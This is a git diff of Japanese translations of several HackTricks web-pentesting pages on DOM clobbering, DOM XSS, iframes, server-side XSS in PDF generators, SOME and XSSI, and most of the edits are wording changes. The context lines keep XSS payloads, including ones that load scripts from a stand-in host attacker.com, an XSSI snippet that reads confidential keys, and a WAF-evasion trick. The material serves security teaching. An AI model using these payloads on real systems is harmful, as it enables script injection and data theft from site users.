-> \- 非空の[id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)コンテンツ属性を持ち、ドキュメントを[ルート](https://dom.spec.whatwg.org/#concept-tree-root)とする[ドキュメントツリー](https://dom.spec.whatwg.org/#in-a-document-tree)内にあるすべての[exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element)要素の[id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)コンテンツ属性の値；
+> \- 空でない [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) コンテンツ属性を持ち、ドキュメントを [root](https://dom.spec.whatwg.org/#concept-tree-root) とする [document tree](https://dom.spec.whatwg.org/#in-a-document-tree) にあるすべての [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) 要素の [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) コンテンツ属性の値；
 > \
-> \- 非空の[id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)コンテンツ属性と非空の名前コンテンツ属性の両方を持ち、ドキュメントを[ルート](https://dom.spec.whatwg.org/#concept-tree-root)とする[ドキュメントツリー](https://dom.spec.whatwg.org/#in-a-document-tree)内にあるすべての[img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element)要素の[id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)コンテンツ属性の値。
+> \- 空でない [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) コンテンツ属性と空でない名前コンテンツ属性の両方を持ち、ドキュメントを [root](https://dom.spec.whatwg.org/#concept-tree-root) とする [document tree](https://dom.spec.whatwg.org/#in-a-document-tree) にあるすべての [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) 要素の [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) コンテンツ属性の値。
 
-この技術を使用すると、一般的に使用される **`document.cookie`、`document.body`、`document.children`** などの値や、`document.querySelector` のようなドキュメントインターフェース内のメソッドを上書きできます。
+この技術を使用すると、一般的に使用される **`document.cookie`、`document.body`、`document.children`** などの **値を上書き** したり、`document.querySelector` のような Document インターフェースのメソッドを上書きしたりできます。
 ```javascript
 document.write("<img name=cookie />")
 
@@ -154,7 +154,7 @@ alert(document.querySelector(".x").innerText) // Clobbered
 </script>
 </p>
 ```
-さらに、これらの挿入されたHTML/bodyタグを隠すためにスタイルを使用することで、`innerText`内の他のテキストからの干渉を防ぎ、攻撃の効果を高めることができます。
+さらに、これらの挿入されたHTML/bodyタグを隠すためにスタイルを使用することで、`innerText`内の他のテキストからの干渉を防ぎ、攻撃の効果を高めることができます：
 ```html
 <div style="display:none" id="cdnDomain">test</div>
 <p>existing text</p>
@@ -182,7 +182,7 @@ clobbered
 alert(document.getElementById("cdnDomain").innerText) // Clobbered
 </script>
 ```
-HTML タグが Chrome や Firefox のようなブラウザ内の SVG で機能するためには、`<foreignobject>` タグが必要です:
+HTML タグが Chrome や Firefox のようなブラウザ内の SVG で機能するためには、`<foreignobject>` タグが必要です：
 ```html
 <div style="display:none" id="cdnDomain">example.com</div>
 <svg>
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-invader.md b/src/pentesting-web/xss-cross-site-scripting/dom-invader.md
index ee8db475f..15ba9fa8c 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-invader.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-invader.md
@@ -9,9 +9,9 @@ DOM Invaderは、Burpの内蔵ブラウザにインストールされたブラ
 DOM Invaderは、ブラウザのDevToolsパネル内にタブを統合し、以下を可能にします：
 
 1. **DOM XSSテストのためのウェブページ上の制御可能なシンクの特定**、コンテキストとサニタイズの詳細を提供します。
-2. **`postMessage()`メソッドを介して送信されたウェブメッセージのログ、編集、および再送信**を行い、DOM XSSテストを実施します。DOM Invaderは、特別に作成されたウェブメッセージを使用して脆弱性を自動検出することもできます。
+2. **`postMessage()`メソッドを介して送信されたウェブメッセージのログ記録、編集、および再送信**。DOM Invaderは、特別に作成されたウェブメッセージを使用して脆弱性を自動検出することもできます。
 3. **クライアントサイドのプロトタイプ汚染**ソースの検出と、リスクのあるシンクに送信される制御可能なガジェットのスキャン。
-4. **DOMクラッキング脆弱性の特定**。
+4. **DOMクラッバーリング脆弱性の特定**。
 
 ### 有効にする
 
@@ -25,7 +25,7 @@ Burpの内蔵ブラウザで**Burp拡張機能**に移動し、有効にしま
 
 ### カナリアを注入する
 
-前の画像には**ランダムな文字のグループ、つまりカナリア**が表示されています。これをウェブのさまざまな部分（パラメータ、フォーム、URLなど）に**注入**し、毎回検索をクリックしてください。DOM Invaderは、**カナリアが興味深いシンクに到達したかどうか**を確認します。
+前の画像には**ランダムな文字のグループ、つまりカナリア**が表示されています。これをウェブのさまざまな部分（パラメータ、フォーム、URLなど）に**注入**し、毎回検索をクリックする必要があります。DOM Invaderは、**カナリアが興味深いシンクに到達したかどうか**を確認します。
 
 さらに、**Inject URL params**および**Inject forms**オプションは、自動的に**新しいタブ**を開き、見つけたすべての**URL**パラメータと**フォーム**に**カナリアを注入**します。
 
@@ -35,11 +35,11 @@ Burpの内蔵ブラウザで**Burp拡張機能**に移動し、有効にしま
 
 ### メッセージを投稿する
 
-DOM Invaderは、以下の機能を使用してウェブメッセージを介したDOM XSSのテストを可能にします：
+DOM Invaderは、ウェブメッセージを使用してDOM XSSをテストすることを可能にし、以下の機能を提供します：
 
-1. **`postMessage()`を介して送信されたウェブメッセージのログ**、Burp ProxyのHTTPリクエスト/レスポンス履歴ログに似ています。
-2. **ウェブメッセージの** **変更**および**再発行**を行い、DOM XSSを手動でテストします。これはBurp Repeaterの機能に似ています。
-3. **ウェブメッセージの自動変更**および送信を行い、DOM XSSを調査します。
+1. **`postMessage()`を介して送信されたウェブメッセージのログ記録**、Burp ProxyのHTTPリクエスト/レスポンス履歴ログに似ています。
+2. **ウェブメッセージの**修正**と**再発行**、手動でDOM XSSをテストするため、Burp Repeaterの機能に似ています。
+3. **ウェブメッセージの自動変更**と送信によるDOM XSSの調査。
 
 #### メッセージの詳細
 
@@ -47,7 +47,7 @@ DOM Invaderは、以下の機能を使用してウェブメッセージを介し
 
 - **`origin`** : メッセージの**オリジン情報がチェックされていない場合**、任意の外部ドメインからイベントハンドラーにクロスオリジンメッセージを送信できる可能性があります。しかし、チェックされている場合でも、依然として安全でない可能性があります。
 - **`data`**: ここにペイロードが送信されます。このデータが使用されない場合、シンクは無意味です。
-- **`source`**: 通常はiframeを参照するソースプロパティが検証されているかどうかを評価します。これがチェックされていても、検証がバイパスされる可能性があることを保証するものではありません。
+- **`source`**: 通常はiframeを参照するソースプロパティがオリジンの代わりに検証されているかどうかを評価します。これがチェックされていても、検証がバイパスされないことは保証されません。
 
 #### メッセージに返信する
 
@@ -71,7 +71,7 @@ b.testproperty
 ソースを見つけたら、**ガジェットをスキャン**できます：
 
 1. **DOM**ビューで特定されたプロトタイプ汚染ソースの隣にある**ガジェットをスキャン**ボタンをクリックすると、DOM Invaderによって新しいタブが開かれます。適切なガジェットのスキャンが始まります。
-2. 一方、同じタブで、DevToolsパネルに**DOM Invader**タブが開かれている必要があります。スキャンが完了すると、特定されたガジェットを介してアクセス可能なシンクが**DOM**ビューに表示されます。例えば、`innerHTML`シンクに渡される`html`という名前のガジェットプロパティが以下の例に示されています。
+2. 同じタブで、DevToolsパネルに**DOM Invader**タブが開かれている必要があります。スキャンが完了すると、特定されたガジェットを介してアクセス可能なシンクが**DOM**ビューに表示されます。例えば、`innerHTML`シンクに渡される`html`という名前のガジェットプロパティが以下の例に示されています。
 
 ## DOMクラッキング
 
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
index aad4a8d50..2f3df1d5e 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
@@ -6,7 +6,7 @@
 
 DOM 脆弱性は、攻撃者が制御する **ソース**（`location.search`、`document.referrer`、または `document.cookie` など）からのデータが安全でない方法で **シンク** に転送されるときに発生します。シンクは、悪意のあるデータが与えられた場合に有害なコンテンツを実行またはレンダリングできる関数やオブジェクト（例：`eval()`、`document.body.innerHTML`）です。
 
-- **ソース** は、攻撃者によって操作可能な入力であり、URL、クッキー、ウェブメッセージを含みます。
+- **ソース** は、攻撃者によって操作可能な入力であり、URL、クッキー、ウェブメッセージが含まれます。
 - **シンク** は、悪意のあるデータが悪影響を及ぼす可能性のある危険なエンドポイントであり、スクリプトの実行などを引き起こす可能性があります。
 
 リスクは、データが適切な検証やサニタイズなしにソースからシンクに流れるときに発生し、XSS のような攻撃を可能にします。
@@ -199,7 +199,7 @@ FileReader.root.getFile()
 
 From: [https://portswigger.net/web-security/dom-based/client-side-sql-injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection)
 
-**クライアントサイドSQLインジェクションの脆弱性**は、スクリプトが**攻撃者が制御可能なデータをクライアントサイドのSQLクエリに安全でない方法で組み込むとき**に発生します。
+**クライアントサイドSQLインジェクション脆弱性**は、スクリプトが**攻撃者が制御可能なデータをクライアントサイドのSQLクエリに安全でない方法で組み込むとき**に発生します。
 
 Sinks:
 ```javascript
@@ -243,17 +243,17 @@ $.parseJSON()
 
 From: [https://portswigger.net/web-security/dom-based/web-message-manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation)
 
-**Web-message vulnerabilities** は、スクリプトが **攻撃者が制御可能なデータをウェブメッセージとしてブラウザ内の別のドキュメントに送信する** ときに発生します。脆弱なWebメッセージ操作の **例** は、[PortSwiggerのWebセキュリティアカデミー](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source) で見つけることができます。
+**Web-messageの脆弱性**は、スクリプトが**攻撃者が制御可能なデータをウェブメッセージとしてブラウザ内の別のドキュメントに送信する**ときに発生します。脆弱なWeb-message操作の**例**は、[PortSwiggerのWeb Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source)で見つけることができます。
 
 Sinks:
 
-`postMessage()` メソッドを使用してウェブメッセージを送信する場合、メッセージを受信するためのイベントリスナーが受信データを安全でない方法で処理すると、脆弱性が発生する可能性があります。
+`postMessage()`メソッドを使用してウェブメッセージを送信する場合、メッセージを受信するためのイベントリスナーが受信データを安全でない方法で処理すると、脆弱性が発生する可能性があります。
 
 ### DOM-data manipulation
 
 From: [https://portswigger.net/web-security/dom-based/dom-data-manipulation](https://portswigger.net/web-security/dom-based/dom-data-manipulation)
 
-**DOM-data manipulation vulnerabilities** は、スクリプトが **攻撃者が制御可能なデータをDOM内のフィールドに書き込む** ときに発生します。このフィールドは、可視UIまたはクライアントサイドのロジックで利用されます。この脆弱性は、攻撃者が他のユーザーが訪問した場合に、クライアントサイドのUIの外観や動作を変更するURLを構築するために悪用される可能性があります。
+**DOMデータ操作の脆弱性**は、スクリプトが**攻撃者が制御可能なデータをDOM内のフィールドに書き込む**ときに発生します。このフィールドは、可視UIまたはクライアントサイドのロジックで利用されます。この脆弱性は、攻撃者がURLを構築するために悪用でき、他のユーザーがそのURLを訪れると、クライアントサイドのUIの外観や動作を変更することができます。
 
 Sinks:
 ```javascript
diff --git a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
index c8dcd2f8e..d858bc4b3 100644
--- a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
+++ b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
@@ -48,7 +48,7 @@ alert(parent.secret)
 前のHTMLにHTTPサーバー（例えば`python3 -m http.server`）を介してアクセスすると、すべてのスクリプトが実行されることに気付くでしょう（CSPがそれを防いでいないため）。**親は任意のiframe内の`secret`変数にアクセスできません**が、**if2とif3（同一サイトと見なされる）は元のウィンドウの秘密にアクセスできます**。\
 if4は`null`オリジンと見なされることに注意してください。
 
-### CSPを持つiframe <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
+### CSPを持つIframes <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
 
 > [!NOTE]
 > 次のバイパスでは、iframeページへの応答にJS実行を防ぐCSPヘッダーが含まれていないことに注意してください。
diff --git a/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md b/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
index f520cd532..7dc95f622 100644
--- a/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
+++ b/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
@@ -4,13 +4,13 @@
 
 ## 基本情報
 
-JavaScript言語では、**Hoisting**として知られるメカニズムがあり、変数、関数、クラス、またはインポートの宣言がコードが実行される前にそのスコープの先頭に概念的に持ち上げられます。このプロセスはJavaScriptエンジンによって自動的に行われ、スクリプトを複数回通過します。
+JavaScript言語では、**Hoisting**として知られるメカニズムがあり、変数、関数、クラス、またはインポートの宣言がコードが実行される前にそのスコープの先頭に概念的に持ち上げられます。このプロセスはJavaScriptエンジンによって自動的に実行され、スクリプトを複数回通過します。
 
-最初のパスでは、エンジンがコードを解析して構文エラーをチェックし、抽象構文木に変換します。このフェーズにはホイスティングが含まれ、特定の宣言が実行コンテキストの先頭に移動されるプロセスです。解析フェーズが成功すると、構文エラーがないことを示し、スクリプトの実行が進行します。
+最初のパスでは、エンジンがコードを解析して構文エラーをチェックし、抽象構文木に変換します。このフェーズにはホイスティングが含まれ、特定の宣言が実行コンテキストの先頭に移動されるプロセスです。解析フェーズが成功すれば、構文エラーがないことを示し、スクリプトの実行が進行します。
 
 理解することが重要です：
 
-1. スクリプトは実行されるために構文エラーがない必要があります。構文ルールは厳密に遵守されなければなりません。
+1. スクリプトは実行されるために構文エラーがない必要があります。構文ルールは厳密に守られなければなりません。
 2. スクリプト内のコードの配置はホイスティングのために実行に影響を与えますが、実行されるコードはそのテキスト表現とは異なる場合があります。
 
 #### ホイスティングの種類
@@ -26,7 +26,7 @@ MDNの情報に基づくと、JavaScriptには4つの異なるホイスティン
 
 ## シナリオ
 
-したがって、**未宣言のオブジェクト**が使用された後に**JSコードを注入**できるシナリオがある場合、宣言することで構文を**修正**できる（エラーを投げるのではなく、あなたのコードが実行されるように）：
+したがって、**未宣言のオブジェクト**が使用された後に**JSコードを注入できる**シナリオがある場合、宣言することで構文を**修正**できる（エラーを投げるのではなく、あなたのコードが実行されるように）：
 ```javascript
 // The function vulnerableFunction is not defined
 vulnerableFunction('test', '<INJECTION>');
diff --git a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
index e35b72315..39459caf1 100644
--- a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
+++ b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
@@ -55,7 +55,7 @@ log.push([i,j])
 }
 console.log(log)//[35,33],[47,47]
 ```
-### 有効なJSの改行文字
+### 有効なJS改行文字
 ```javascript
 //Javascript interpret as new line these chars:
 String.fromCharCode(10) //0x0a
@@ -110,7 +110,7 @@ console.log(log) //34,39,47,96
 ```
 ### **サロゲートペア BF**
 
-この技術はXSSにはあまり役に立ちませんが、WAFの保護を回避するのには役立つかもしれません。このPythonコードは2バイトを入力として受け取り、最初のバイトが高サロゲートペアの最後のバイトであり、最後のバイトが低サロゲートペアの最後のバイトであるサロゲートペアを検索します。
+この技術はXSSにはあまり役に立ちませんが、WAFの保護を回避するのには役立つかもしれません。このPythonコードは2バイトを入力として受け取り、最初のバイトがハイサロゲートペアの最後のバイトであり、最後のバイトがローサロゲートペアの最後のバイトであるサロゲートペアを検索します。
 ```python
 def unicode(findHex):
 for i in range(0,0xFFFFF):
@@ -170,7 +170,7 @@ log.push(i)
 }
 console.log(log) //9,10,13,47,92
 ```
-### HTML フuzzing
+### HTML ファジング
 ```javascript
 // Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 38). Kindle Edition.
 
@@ -241,7 +241,7 @@ test_apply.apply(null, ["arg1", "arg2"])
 ```
 ### アロー関数
 
-アロー関数を使用すると、関数を1行でより簡単に生成できます（理解していれば）。
+アロー関数は、1行で関数をより簡単に生成することを可能にします（理解していれば）。
 ```javascript
 // Traditional
 function (a){ return a + 1; }
@@ -264,7 +264,7 @@ let a = 4;
 let b = 2;
 () => a + b + 1;
 ```
-だから、以前の関数のほとんどは実際には無駄です。なぜなら、それらを保存して呼び出す場所がないからです。例として、`plusone`関数を作成します：
+ほとんどの前の関数は、保存して呼び出す場所がないため、実際には無駄です。例として、`plusone`関数を作成します:
 ```javascript
 // Traductional
 function plusone(a) {
@@ -274,9 +274,9 @@ return a + 1
 //Arrow
 plusone = (a) => a + 100
 ```
-### バインド関数
+### Bind関数
 
-バインド関数は、**`this`** オブジェクトと与えられた **パラメータ** を変更する **関数のコピー** を作成することを可能にします。
+bind関数は、**`this`**オブジェクトと与えられた**パラメータ**を変更する**関数のコピー**を作成することを可能にします。
 ```javascript
 //This will use the this object and print "Hello World"
 var fn = function (param1, param2) {
@@ -305,7 +305,7 @@ bindFn_change("Hello", "World")
 
 ### 関数コードの漏洩
 
-関数の **オブジェクトにアクセス** できる場合、その関数の **コードを取得** できます。
+関数の **オブジェクト** に **アクセス** できる場合、その関数の **コード** を **取得** できます。
 ```javascript
 function afunc() {
 return 1 + 1
@@ -343,7 +343,7 @@ return String(this)
 /* Hidden commment */
 })()
 ```
-## サンドボックスエスケープ - ウィンドウオブジェクトの回復
+## サンドボックスエスケープ - windowオブジェクトの回復
 
 Windowオブジェクトは、alertやevalのようなグローバルに定義された関数にアクセスすることを可能にします。
 ```javascript
@@ -424,7 +424,7 @@ origValue = val
 
 debugAccess(Object.prototype, "ppmap")
 ```
-## 自動ブラウザアクセスによるペイロードのテスト
+## ペイロードをテストするための自動ブラウザアクセス
 ```javascript
 //Taken from https://github.com/svennergr/writeups/blob/master/inti/0621/README.md
 const puppeteer = require("puppeteer")
diff --git a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
index b5a29d106..e9d2e1d0d 100644
--- a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
+++ b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
@@ -1,6 +1,6 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-**PDFファイル内に入力が反映されている場合、JavaScriptを実行したりPDFコンテンツを盗むためにPDFデータを注入してみることができます。**
+**PDFファイル内に入力が反映されている場合、PDFデータを注入してJavaScriptを実行したり、PDFの内容を盗むことができます。**
 
 投稿を確認してください: [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)
 
diff --git a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
index feaf81d2a..60edfd844 100644
--- a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
+++ b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
@@ -1,22 +1,22 @@
-# サーバーサイド XSS (動的 PDF)
+# サーバーサイドXSS（動的PDF）
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## サーバーサイド XSS (動的 PDF)
+## サーバーサイドXSS（動的PDF）
 
-ウェブページがユーザー制御の入力を使用して PDF を作成している場合、PDF を作成しているボットを **だまして** **任意の JS コードを実行させる**ことができます。\
-したがって、**PDF 作成ボットが**何らかの **HTML** **タグ**を見つけると、それを **解釈**し、この動作を **悪用**して **サーバー XSS** を引き起こすことができます。
+ウェブページがユーザー制御の入力を使用してPDFを作成している場合、PDFを作成しているボットを**だまして**、**任意のJSコードを実行させる**ことができます。\
+したがって、**PDF作成ボットが**何らかの**HTML** **タグ**を見つけると、それを**解釈**し、この動作を**悪用**して**サーバーXSS**を引き起こすことができます。
 
-`<script></script>` タグは常に機能するわけではないので、JS を実行するために別の方法が必要です（例えば、`<img` を悪用するなど）。\
-また、通常のエクスプロイトでは、作成された PDF を **見る/ダウンロードすることができる**ため、JS を介して **書いたもの**（例えば `document.write()` を使用）をすべて見ることができます。しかし、作成された PDF を **見ることができない**場合、**情報を抽出するためにウェブリクエストを行う必要がある**でしょう（ブラインド）。
+`<script></script>`タグは常に機能するわけではないので、JSを実行するために別の方法が必要です（例えば、`<img`を悪用するなど）。\
+また、通常のエクスプロイトでは、作成されたPDFを**見る/ダウンロードすることができる**ため、**JSを介して書いたもの**（例えば、`document.write()`を使用）をすべて見ることができます。しかし、作成されたPDFを**見ることができない**場合、**情報を抽出するためにウェブリクエストを行う必要がある**でしょう（ブラインド）。
 
-### 人気の PDF 生成
+### 人気のPDF生成
 
-- **wkhtmltopdf** は、HTML と CSS を PDF ドキュメントに変換する能力で知られており、WebKit レンダリングエンジンを利用しています。このツールはオープンソースのコマンドラインユーティリティとして利用可能で、幅広いアプリケーションにアクセスできます。
-- **TCPDF** は、PDF 生成のための PHP エコシステム内で堅牢なソリューションを提供します。画像、グラフィックス、暗号化を処理でき、複雑なドキュメントを作成するための多様性を示しています。
-- Node.js 環境で作業している人には、**PDFKit** が実行可能なオプションを提供します。HTML と CSS から直接 PDF ドキュメントを生成でき、ウェブコンテンツと印刷可能な形式の橋渡しをします。
-- Java 開発者は、PDF 作成を促進するだけでなく、デジタル署名やフォーム入力などの高度な機能をサポートするライブラリ **iText** を好むかもしれません。その包括的な機能セットは、安全でインタラクティブなドキュメントを生成するのに適しています。
-- **FPDF** は、シンプルさと使いやすさで際立つ別の PHP ライブラリです。広範な機能を必要とせず、PDF 生成への簡単なアプローチを求める開発者向けに設計されています。
+- **wkhtmltopdf**は、HTMLとCSSをPDF文書に変換する能力で知られており、WebKitレンダリングエンジンを利用しています。このツールはオープンソースのコマンドラインユーティリティとして利用可能で、幅広いアプリケーションにアクセスできます。
+- **TCPDF**は、PDF生成のためのPHPエコシステム内で堅牢なソリューションを提供します。画像、グラフィックス、暗号化を処理でき、複雑な文書を作成するための多様性を示しています。
+- Node.js環境で作業している人には、**PDFKit**が実行可能なオプションを提供します。HTMLとCSSから直接PDF文書を生成でき、ウェブコンテンツと印刷可能な形式の橋渡しをします。
+- Java開発者は、PDF作成を促進するだけでなく、デジタル署名やフォーム入力などの高度な機能もサポートするライブラリ**iText**を好むかもしれません。その包括的な機能セットは、安全でインタラクティブな文書を生成するのに適しています。
+- **FPDF**は、シンプルさと使いやすさで際立つ別のPHPライブラリです。広範な機能を必要とせず、PDF生成に対して簡単なアプローチを求める開発者向けに設計されています。
 
 ## ペイロード
 
@@ -71,7 +71,7 @@ if not, you will at least have wich path the bot is accessing -->
 ```
 ### 外部スクリプトを読み込む
 
-この脆弱性を悪用する最も適切な方法は、脆弱性を利用してボットにあなたがローカルで制御するスクリプトを読み込ませることです。そうすれば、ペイロードをローカルで変更し、ボットが毎回同じコードでそれを読み込むようにすることができます。
+この脆弱性を悪用する最も適切な方法は、脆弱性を利用してボットにあなたがローカルで制御するスクリプトを読み込ませることです。そうすれば、ローカルでペイロードを変更し、ボットが毎回同じコードでそれを読み込むようにできます。
 ```markup
 <script src="http://attacker.com/myscripts.js"></script>
 <img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
diff --git a/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md b/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md
index 37b7076d7..df652aae2 100644
--- a/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md
+++ b/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md
@@ -1,4 +1,4 @@
-# シャドウDOM
+# Shadow DOM
 
 {{#include ../../banners/hacktricks-training.md}}
 
diff --git a/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md b/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md
index a3408c3fd..260299eeb 100644
--- a/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md
+++ b/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md
@@ -2,12 +2,12 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## UTF16に変換してスクリプトの内容を漏洩させる
+## UTF16に変換してスクリプトコンテンツを漏洩させる
 
-[**このレポート**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#modernism21-solves) は、`X-Content-Type-Options: nosniff` ヘッダーがないため、いくつかの初期文字を追加することでテキスト/plainを漏洩させ、javascriptが内容をUTF-16として認識するようにします。そのため、スクリプトは壊れません。
+[**このレポート**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#modernism21-solves)は、`X-Content-Type-Options: nosniff`ヘッダーがないため、javascriptがコンテンツをUTF-16だと考えるように初期文字を追加することでtext/plainを漏洩させます。
 
-## ICOとして扱ってスクリプトの内容を漏洩させる
+## ICOとして扱ってスクリプトコンテンツを漏洩させる
 
-[**次のレポート**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#precisionism3-solves) は、`width` パラメータにアクセスしてICO画像のようにロードすることでスクリプトの内容を漏洩させます。
+[**次のレポート**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#precisionism3-solves)は、`width`パラメータにアクセスしてICO画像のようにロードすることでスクリプトコンテンツを漏洩させます。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md b/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
index 9ffba658b..db5c53cff 100644
--- a/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
+++ b/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
@@ -6,9 +6,9 @@
 
 ページ内で制限されたjavascriptを実行できる場合があります。例えば、[ **実行されるコールバック値を制御できる**](./#javascript-function)場合です。
 
-その場合、最も良いことの一つは、**DOMにアクセスして見つけた任意の**機密アクションを呼び出すことです（ボタンをクリックするなど）。しかし、通常、この脆弱性は**DOMに興味深いものがない小さなエンドポイント**で見つかります。
+その場合、最も良いことの一つは、**DOMにアクセスして見つけた敏感なアクションを呼び出す**ことです（ボタンをクリックするなど）。しかし、通常、この脆弱性は**DOMに興味深いものがない小さなエンドポイント**で見つかります。
 
-これらのシナリオでは、この攻撃は非常に有用です。なぜなら、その目的は**同じドメインの異なるページ内のDOMで制限されたJS実行を悪用すること**だからです。
+これらのシナリオでは、この攻撃は非常に有用です。なぜなら、その目的は**同じドメインの異なるページ内のDOMでの制限されたJS実行を悪用する**ことだからです。
 
 基本的な攻撃の流れは次のとおりです：
 
@@ -26,7 +26,7 @@
 
 ### Exploitation
 
-- このフォームを使用して**このタイプの脆弱性を悪用するPoCを生成**できます：[https://www.someattack.com/Playground/SOMEGenerator](https://www.someattack.com/Playground/SOMEGenerator)
+- このフォームを使用してこのタイプの脆弱性を悪用するための**PoCを生成**できます：[https://www.someattack.com/Playground/SOMEGenerator](https://www.someattack.com/Playground/SOMEGenerator)
 - クリックするHTML要素へのDOMパスを見つけるために、このブラウザ拡張機能を使用できます：[https://www.someattack.com/Playground/targeting_tool](https://www.someattack.com/Playground/targeting_tool)
 
 ### Example
diff --git a/src/pentesting-web/xssi-cross-site-script-inclusion.md b/src/pentesting-web/xssi-cross-site-script-inclusion.md
index e6db8b428..78e6b54c6 100644
--- a/src/pentesting-web/xssi-cross-site-script-inclusion.md
+++ b/src/pentesting-web/xssi-cross-site-script-inclusion.md
@@ -10,7 +10,7 @@
 
 - **SOPのバイパス**: スクリプトは **Same-Origin Policy** から免除されており、ドメインを越えて含めることができます。
 - **データの露出**: 攻撃者はこの動作を利用して、`script` タグを介して読み込まれたデータを読み取ることができます。
-- **動的JavaScript/JSONPへの影響**: **XSSI** は特に動的JavaScriptや **JSON with Padding (JSONP)** に関連しています。これらの技術は、認証のために「環境権限」情報（クッキーなど）を使用することがよくあります。異なるホストへのスクリプトリクエストが行われると、これらの資格情報（クッキーなど）が自動的にリクエストに含まれます。
+- **動的JavaScript/JSONPへの影響**: **XSSI** は特に動的JavaScriptや **JSON with Padding (JSONP)** に関連しています。これらの技術は、認証のために「環境権限」情報（クッキーなど）を使用することがよくあります。異なるホストへのスクリプトリクエストが行われると、これらの資格情報（例：クッキー）が自動的にリクエストに含まれます。
 - **認証トークンの漏洩**: 攻撃者がユーザーのブラウザを騙して、自分が制御するサーバーからスクリプトをリクエストさせることができれば、これらのリクエストに含まれる機密情報にアクセスできる可能性があります。
 
 ### タイプ
@@ -24,18 +24,18 @@
 
 ### 通常のXSSI
 
-このアプローチでは、プライベート情報がグローバルにアクセス可能なJavaScriptファイルに埋め込まれています。攻撃者は、ファイルの読み取り、キーワード検索、または正規表現などの方法を使用してこれらのファイルを特定できます。一度見つかると、プライベート情報を含むスクリプトは悪意のあるコンテンツに含められ、機密データへの不正アクセスを可能にします。以下に例示される悪用技術があります:
+このアプローチでは、プライベート情報がグローバルにアクセス可能なJavaScriptファイルに埋め込まれています。攻撃者は、ファイルの読み取り、キーワード検索、または正規表現などの方法を使用してこれらのファイルを特定できます。一度見つかると、プライベート情報を含むスクリプトは悪意のあるコンテンツに含められ、機密データへの不正アクセスを可能にします。以下に例示された悪用技術があります:
 ```html
 <script src="https://www.vulnerable-domain.tld/script.js"></script>
 <script>
 alert(JSON.stringify(confidential_keys[0]))
 </script>
 ```
-### Dynamic-JavaScript-based-XSSI と Authenticated-JavaScript-XSSI
+### Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI
 
